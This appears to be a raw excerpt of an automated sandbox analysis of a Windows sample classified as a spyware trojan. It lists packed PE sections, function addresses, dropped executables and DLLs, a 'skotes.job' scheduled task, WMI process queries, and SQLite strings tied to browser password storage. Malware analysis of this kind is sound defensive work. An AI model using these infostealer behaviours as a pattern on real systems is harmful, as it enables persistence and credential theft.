Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: .rsrc
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name: .idata
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: section name:
Source: num[1].exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C7362C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy, 6_2_6C7362C0
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5BAC60 6_2_6C5BAC60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C68AC30 6_2_6C68AC30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C676C00 6_2_6C676C00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5AECC0 6_2_6C5AECC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C60ECD0 6_2_6C60ECD0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C67ED70 6_2_6C67ED70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6DAD50 6_2_6C6DAD50
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C738D20 6_2_6C738D20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C73CDC0 6_2_6C73CDC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B4DB0 6_2_6C5B4DB0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C646D90 6_2_6C646D90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C64EE70 6_2_6C64EE70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C690E20 6_2_6C690E20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5BAEC0 6_2_6C5BAEC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C650EC0 6_2_6C650EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C636E90 6_2_6C636E90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C672F70 6_2_6C672F70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C61EF40 6_2_6C61EF40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B6F10 6_2_6C5B6F10
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F0F20 6_2_6C6F0F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C68EFF0 6_2_6C68EFF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B0FE0 6_2_6C5B0FE0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F8FB0 6_2_6C6F8FB0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5BEFB0 6_2_6C5BEFB0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C684840 6_2_6C684840
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C600820 6_2_6C600820
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C63A820 6_2_6C63A820
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6B68E0 6_2_6C6B68E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5E8960 6_2_6C5E8960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C606900 6_2_6C606900
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6CC9E0 6_2_6C6CC9E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5E49F0 6_2_6C5E49F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6409A0 6_2_6C6409A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C66A9A0 6_2_6C66A9A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6709B0 6_2_6C6709B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C62CA70 6_2_6C62CA70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C668A30 6_2_6C668A30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C65EA00 6_2_6C65EA00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C62EA80 6_2_6C62EA80
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6B6BE0 6_2_6C6B6BE0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C650BA0 6_2_6C650BA0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5C8460 6_2_6C5C8460
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C614420 6_2_6C614420
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C63A430 6_2_6C63A430
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5F64D0 6_2_6C5F64D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C64A4D0 6_2_6C64A4D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6DA480 6_2_6C6DA480
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C612560 6_2_6C612560
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C650570 6_2_6C650570
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C608540 6_2_6C608540
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6B4540 6_2_6C6B4540
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F8550 6_2_6C6F8550
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C67A5E0 6_2_6C67A5E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C63E5F0 6_2_6C63E5F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5A45B0 6_2_6C5A45B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C60C650 6_2_6C60C650
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C60E6E0 6_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C64E6E0 6_2_6C64E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5D46D0 6_2_6C5D46D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C630700 6_2_6C630700
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5DA7D0 6_2_6C5DA7D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5FE070 6_2_6C5FE070
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C67C000 6_2_6C67C000
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C678010 6_2_6C678010
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5A8090 6_2_6C5A8090
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C68C0B0 6_2_6C68C0B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5C00B0 6_2_6C5C00B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C618140 6_2_6C618140
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C626130 6_2_6C626130
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C694130 6_2_6C694130
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B01E0 6_2_6C5B01E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C638260 6_2_6C638260
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C648250 6_2_6C648250
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C688220 6_2_6C688220
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C67A210 6_2_6C67A210
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C7362C0 6_2_6C7362C0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6822A0 6_2_6C6822A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C67E2B0 6_2_6C67E2B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6CC360 6_2_6C6CC360
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C646370 6_2_6C646370
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B8340 6_2_6C5B8340
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F2370 6_2_6C6F2370
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B2370 6_2_6C5B2370
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C622320 6_2_6C622320
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6043E0 6_2_6C6043E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C60E3B0 6_2_6C60E3B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5E23A0 6_2_6C5E23A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5B3C40 6_2_6C5B3C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6D9C40 6_2_6C6D9C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5C1C30 6_2_6C5C1C30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C671CE0 6_2_6C671CE0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6EDCD0 6_2_6C6EDCD0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C613D00 6_2_6C613D00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C681DC0 6_2_6C681DC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5A3D80 6_2_6C5A3D80
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6F9D90 6_2_6C6F9D90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C70BE70 6_2_6C70BE70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C735E60 6_2_6C735E60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6BDE10 6_2_6C6BDE10
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5D3EC0 6_2_6C5D3EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C707F20 6_2_6C707F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5A5F30 6_2_6C5A5F30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5E5F20 6_2_6C5E5F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C65BFF0 6_2_6C65BFF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6CDFC0 6_2_6C6CDFC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C733FC0 6_2_6C733FC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5D1F90 6_2_6C5D1F90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C60D810 6_2_6C60D810
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C70B8F0 6_2_6C70B8F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C68F8F0 6_2_6C68F8F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5BD8E0 6_2_6C5BD8E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C5E38E0 6_2_6C5E38E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C62F960 6_2_6C62F960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C66D960 6_2_6C66D960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C665920 6_2_6C665920
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: String function: 6C5D3620 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: String function: 6C5D9B10 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: String function: 6C6E9F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: String function: 6C60C5E0 appears 35 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.998114224137931
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: Section: ZLIB complexity 0.998446014986376
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.998446014986376
Source: skotes.exe.4.dr Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: random[1].exe.7.dr Static PE information: Section: ZLIB complexity 0.998114224137931
Source: e192e43b61.exe.7.dr Static PE information: Section: ZLIB complexity 0.998114224137931
Source: random[1].exe0.7.dr Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: b0b9f39429.exe.7.dr Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: Section: ZLIB complexity 0.998446014986376
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@51/42@7/7
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C610300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 6_2_6C610300
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OEHXUQRB.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.1733012130.0000000005E47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733332516.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2277724392.000000001D6E4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2607664389.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2740168435.0000000005AAE000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2809108791.0000000005ACA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created 